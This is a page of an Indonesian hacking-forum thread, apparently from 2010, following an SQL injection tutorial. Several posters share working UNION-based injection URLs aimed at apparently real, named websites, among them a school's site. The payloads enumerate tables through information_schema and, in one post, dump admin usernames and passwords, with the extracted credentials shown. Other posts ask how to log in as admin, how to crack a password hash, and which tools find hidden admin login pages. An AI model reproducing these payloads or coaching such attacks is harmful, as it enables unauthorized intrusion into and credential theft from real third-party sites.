Page 8 of 9
Re: [TUTORIAL] SQL Injection Pada PHP
Posted: Sun Mar 14, 2010 12:13 pm
by pujiyanto18
ji_bog wrote:pujiyanto18 wrote:klo yg ini gmn mas
msh newbe nih....
Code: Select all
http://www.smkn2bukittinggi.com/gallery.php?id=-5%20union%20select%201,2,3,4,5/*
panjang column nya sampai 8 bro
di bawah ini contohnya ^^
maaf ane cuma bisa bantu sampai di sini
maklum masih latihan juga
Code: Select all
http://www.smkn2bukittinggi.com/gallery.php?id=null%20union%20all%20select%201,group_concat%28table_name%29,3,4,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29
thx boy....
Re: [TUTORIAL] SQL Injection Pada PHP
Posted: Sun Mar 21, 2010 3:14 am
by satube8
kalo ga bisa di sql injection, n sql injection basi pake cara apa yaa..
Re: [TUTORIAL]SQL Injection Pada PHP
Posted: Wed Mar 31, 2010 1:05 pm
by ScootR_3086
[quote="apriliana"][quote="Broo"]butuh pencerahan donk bwt para master...
klo yg ini kira2 bs gk pke SqLi [url]
http://zonetz.com/?q=dn&ref=&nwsid=67'[/url]
msi kebingungan nehh....[/quote]
mau jawban lgsg ato model hint neh?
hint nya:
1. cari tanda untuk ngasih komentar
2.cari agar hasil dr scripntny bernilai false..
3.baru cari magic numbernya...
mgkn kata2ku susah dipahami..
nih deh hasilnya silakan dipelajari perintah berikut
[code]
http://zonetz.com/?q=dn&ref=&nwsid=67+a ... ,3,4,5,6--[/code][/quote]
tak cobain kok dapetnya aneh ya,,salah dmana ni ya??
"http//zonetz.com/?q=dn&ref=&nwsid=67+and+1=2+union+all+select+1,concat_ws(0x3a,nlogin,passwd),3,4,5,6+from+tbadmin--"
zonetzadmin:({�n����-N����l
ad simbol2 aneh.. :mati: :mati:
Re: [TUTORIAL] SQL Injection Pada PHP
Posted: Mon Apr 05, 2010 6:06 pm
by the_nox
binggung neeh ,, wa nemuin error nya pada columb 100
trs yg sy mo tanyain apakah saya harus nulis kek gene
http://sitekorban.com/news/news_detail.php?id=2092 union all select 1,2,3,4,5,6,7,8,9,------100--
soal nya kan kaloe di tutor kan dapet error nya pada order ke 4..
asli bingug banget neeh ...
newbie need help plsssssssssssssssssssssssss :gebrak:
Re: [TUTORIAL] SQL Injection Pada PHP
Posted: Tue Apr 06, 2010 6:34 pm
by Golek_ilmu
mantap euy..... tutornya cocok kayak diriku yang masih cupu bgt..... mau jajal dulu gan....
Re: [TUTORIAL] SQL Injection Pada PHP
Posted: Wed Apr 14, 2010 4:05 pm
by lokrepot
BOS Q MASIH NEWBIE....
http://www.lbpl.in/news_detail.php?id=- ... OM+admin--
TU UDA KELUAR ADMINADM1N...
TRUS KLO MAU LOGIN GMN????
Re: [TUTORIAL] SQL Injection Pada PHP
Posted: Wed Apr 21, 2010 10:08 pm
by aa_him
la ketemu am temen seperjuangan lokrepot....
iya bos tlg pencerahannya....
thx...nice posting
Re: [TUTORIAL] SQL Injection Pada PHP
Posted: Sat Apr 24, 2010 11:44 pm
by black.golem
mao tanya dong,maklum newbie nie ,ane udah nyobain di web laen, n' bisa dapetin username ama passwordnya,tapi ane bingung nie ama passwordnya pake encrypt paan.. pke md5 bukan si???
nie kode'y:
7a88e86e1401d01b985dbc4b30c939dd1db46f34 :circle:
Re: [TUTORIAL]SQL Injection Pada PHP
Posted: Mon May 10, 2010 8:51 pm
by xMikael
Setelah mendapatkan username dan password untuk login page nya gimana caranya ya ?
Code: Select all
http://www.excellentdevelopment.com/news_detail.php?id=-145%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,GROUP_CONCAT%28TABLE_NAME%29,13,14,15,16,17,18,19,20,21,22%20FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x41646D696E4D656E75--
habis udah kaya gini harus gimana ya ? malah muncul AdminMenu semua --a
Re: [TUTORIAL] SQL Injection Pada PHP
Posted: Tue May 11, 2010 12:31 pm
by heri_mew
coba pake tool admin login finder
karena login admin belum tentu pake /admin/ tapi ada juga /cms/ ato /adminlogin.php/
lox pake tool bisa langsung masukkin aja URLnya nah tinggal kamu scan aja dimana halaman loginnya ngumpet
kayaknya senior2 dah bahas itu brulang kali koq :circle:
monggo silakan dicoba :devil